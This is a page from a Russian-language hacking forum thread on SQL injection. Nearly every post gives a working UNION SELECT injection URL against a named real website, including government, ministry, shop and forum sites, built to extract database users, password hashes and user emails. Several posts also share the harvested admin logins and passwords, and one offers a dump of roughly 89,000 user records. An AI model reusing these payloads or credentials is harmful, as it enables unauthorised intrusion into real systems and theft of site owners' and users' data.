SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.reusablebags.com
     
    1 person likes this.
  2. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    И шоп какой-то
    __:)__
     
    3 people like this.
  3. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    e-gov.gr
    Code:
    http://www.e-gov.gr/article.php?sid=-2818+union+select+1,2,3,4,concat(user,0x3a,password),6,7,8,9+from+mysql.user/*
    Code:
    http://www.armeniafund.org/press_releases/press_releases.php?id=-127%20UNION%20SELECT%201,user(),3,4,5,6,7/*
     
    1 person likes this.
  4. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*
    http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=char(114,101,97,100,101,114,115)+limit+0,1/*
    http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,concat(readerid,char(58),readername,char(58),readerbiography),4,5,6,7,8,9,10,11+from+readers/*
     
    3 people like this.
  5. ssk.ex0.uf0

    ssk.ex0.uf0 Elder - Старейшина

    Joined:
    27 Feb 2007
    Messages:
    68
    Likes Received:
    19
    Reputations:
    0
    Вовремя работы наткулся случайно...мож кто захочет поковыряться..)
     
  6. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://www.mekdep.com/Top/index.php?do=rate&id=19'
     
  7. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.ruscico.com/detail.php?lang=ru&film=-1+union+select+1,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+mysql.user+limit+1,1/*
    апдейт:
    Code:
    http://ostro.org/shownews_ks.php?id=-1+union+select+1,2,3,4,5/*
    на таблицы не везет.. =\
    Code:
    http://www.fcdynamo.ru/info.php?id=-1'+union+select+concat_ws(0x3a,name,login,pass)+from+users+limit+2,1/*
    вывода логина/пасса нет, мб таблица другая, мб еще что...
    зато динамо))
     
    #1447 n1†R0x, 29 Mar 2007
    Last edited: 29 Mar 2007
    1 person likes this.
  8. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    DivX.it

    Code:
    __http://www.divx.it/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58),user_icq,char(58),user_password),4,5,6,7,8,9%20from%20phpbb_users%20where%20user_id%3E89650%20and%20user_id%3C89654/*
    более месяца держал эту скулю в привате, теперь могу выложить :)

    89654 юзверей.
    Постараюсь после дамп базы кинуть если кому надо

    PS хе, только что посерфил в инете, их уже ломали, в статью углубляться не стал, возможно там чуть другая скуля __http://www.fssr.ru/hz.php?file=article&name=News&sid=6475
     
    #1448 Thanat0z, 29 Mar 2007
    Last edited: 29 Mar 2007
    5 people like this.
  9. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://rybalka.zooclub.ru/article.php?id=-1+union+select+table_name,2,3+from+information_schema.tables
    ничего интересного =\
     
  10. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.forceprotection.net/news/news_article.html?id=-163+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    Code:
    http://www.comingsoon.net/news/movienews.php?id=-19350+union+select+version()/*
     
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.stroypages.ru/rubrik.php?id_com=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10/*
     
    2 people like this.
  12. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    Code:
    http://gta.com.ua/vice/file_details.phtml?id=60+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
     
    2 people like this.
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
    7 people like this.
  14. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.language-archives.org/archive.php4?id=-58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
     
    2 people like this.
  15. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    ducation.kerala.gov.in
    Code:
    http://www.education.kerala.gov.in/admin/news_details.php?id=-24+union+select+1,2,user,password+from+mysql.user/*
    Code:
    http://www.campingpuntala.it/dyn/ita/shop.php?id=-9%20UNION%20SELECT%201,2,3,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16/*
    
     
    4 people like this.
  16. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Code:
    http://gta.com.ua/vice/file_details.phtml?id=60+union+select+1,2,3,4,5,6,7,username,password,10,11,12,13,14,15,16,17,18,19,20+from+admin/*
    Login: admin
    Pass: 2IsfJILPkOJ2

    ищем админку =)
     
    4 people like this.
  17. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://oculus.ru/stat.php?id=-1+union+select+1,2,3,4,5,convert(version()+using+cp1251),7,8,9,10/*
    подобрать таблицу не дал секьюрити-модуль свеба =\
     
    3 people like this.
  18. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.mnr.gov.ru/part/?act=more&id=964&pid=-429+union+select+concat(user,0x3a,password),2+from+mysql.user/*
     
    1 person likes this.
  19. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Может и было...

    Code:
    http://www.cpdvd.ru/shop.shtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(nam,char(58),email,char(58),pass),14,15,16,17,18,19,20,21+from+users+limit+0,5/*
    Т.к. скуля выводит все записи, то ограничил её лимитом что бы вывела записи с 0 по 5.
     
    1 person likes this.
  20. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    Code:
    http://www.kurscom.ru/catalog.php?a=2&id_shop=-1857+union+select+1,2,3,4,5,6,7,8,9,10,11,12,VERSION(),14,15+from+shop/*
    больше ничего не нашел :(

    P,S,
    Code:
    http://www.kurscom.ru/catalog.php?a=2&id_shop=-1857+union+select+1,2,3,4,5,6,7,8,9,10,11,mail,password,name,15+from+shop/*
    name:EF EDUCATION FIRST
    email:[email protected]
    password:LH5029
     
    #1460 maxster, 30 Mar 2007
    Last edited: 30 Mar 2007
Thread Status:
Not open for further replies.